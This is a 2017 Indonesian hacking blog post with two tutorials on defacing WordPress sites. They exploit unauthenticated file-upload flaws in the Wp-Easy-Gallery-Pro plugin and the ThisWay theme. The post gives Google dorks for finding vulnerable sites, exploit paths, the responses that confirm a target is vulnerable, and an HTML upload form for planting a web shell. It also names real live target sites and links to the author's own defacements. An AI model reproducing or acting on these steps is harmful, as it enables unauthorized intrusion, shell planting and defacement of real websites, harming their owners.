-

Saturday 5 August 2017

Cara Deface Wp-Easy-Gallery-Pro With CSRF + Live Target

Selamat Siang gan hehehe ketemu lagi sama saya Admin yg paling kece& Tamvan wkwkkwkw :v
Oke Sekarang saya mau berbagi Tutorial Seperti Biasa Yaitu Wp-Easy-Gallery-Pro ya Walaupun ini termasuk POC Jadul apa salah Nya Kita Mengupas Lagi Lebih Dalam Biar Mendesah wkwkwk :v
Oke Langsung aja Agan Simak  ;)


Bahan :
-Dork      " /wp-content/plugins/wp-easy-gallery-pro/ "
-CSRF
-Kopi
-Internet
-Waktu
-Exploit    " /wp-content/plugins/wp-easy-gallery-pro/admin/php.php "
-Kesabaran <== ini nih Yg Paling Penting gan :v
-Live TARGET " http://tormoveis.com/ " <== Di mohon Jangan di rusak Gan

1.Masukkan Dorknya di Google .. Dork Bisa di Kembangin Lagi Ya Gan di Kasih Site,intext Dll Biar dapet yg masih Perawan :v

2.Setelah kira" Dapet Target yg Vuln Masukkan Exploit nya..

3.Apabila Vuln ada Tulisan {"error":"No files were uploaded."} Atau Blank... Apabila NotFound Dll Silahkan Next target aja Gan :v

4.Setelah Itu Agan Masukkan Target Beserta Exploit Tadi Ke dalam CSRF Nya Gan

CSRF:

<form enctype="multipart/form-data"
action="http://www.contohweb.com/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

5.Setelah itu CSRF nya di simpan dengan Extensi .html

6.Buka CSRF tadi lalu UPLOAD Shell Agan Apabila ada Tulisan Bla Bla Success Itu tandanya Shell agan Sudah Terupload

7.Buka Letak shell agan Upload Tadi di " /wp-content/uploads/shellagan.php " dan Terserah agan Mau di apakan :v Dosa di tanggung Sendiri gan :p

Nih Hasil Saya Gan : http://tormoveis.com/wp-content/uploads/aku.jpg
                              http://www.madcityblues.tv/wp-content/uploads/Screenshot_25.png.jpg
                              http://maherserv.com/wp-content/uploads/Screenshot_25.png.jpg


Sekian Tutorial kali ini Samapai Bertemu Kembali di Lain Waktu Gan Bye ;)


Mohon di Berikan Sumber Kalau Mau COPAS Gan :D

Cara Deface Wordpress ThisWay Arbitrary File Upload + Live Target

Oke Gan Selamat Datang Kembali di Blog JIC-Team hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut saja Simak Tutorial di bawah ya


Bahan :
1.DORK
2.Exploit
3.CSRF

Eksekusi Selanjutnya

1.Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com <= Bisa di kembangin Lagi Biar dapet yg FRESS Gan 

2.Lalu masukan exploit ini : "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"

- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3.Apabila keluar tulisan seperti ini {"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln Gan :v

4.Lalu pastekan script berikut di notepad, lalu save dengan ekstensi .html
script CSRF 

5.Nanti keluar result/tulisan seperti ini : {"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}

Bila tidak nongol tulisan kaya gitu, cari target lain

6.Akses shell backdoor kalian di
- http://www.target.com/wp-content/uploads/[tahun]/[bulan]/settingsimage_randomnameshell.php

Example :
- http://target.com/wp-content/uploads/2016/09/settingsimage_c99326667788.php

Nih mimin Kasih Live Target Gan .. Jangan di rusak Yak Live Target Nya :D

-http://www.jasminecastillo.com/
-http://thenineyard.com

Nih Juga Hasil Saya Gan :

http://h2ophotographics.com/list.htm
http://www.jasminecastillo.com/wp-content/uploads/2017/08/settingsimage_BDUV6XdGGHf35LVD.htm
 http://thenineyard.com/wp-content/uploads/2017/08/settingsimage_VCQZmDBNPVGRUlEk.htm
http://www.beautyandhair.com.mx/wp-content/uploads/2017/08/settingsimage_EG0d1lfMcSefPM2K.htm


Sekian Tutorial kali ini Gan Semoga bermanfaat ^_^... Bagi Yg Mau CopAS Mohon Di Kasih SUmber nya Gan Trimakasih ;)

By ./51N1CH1
 

Newer Posts Older Posts Home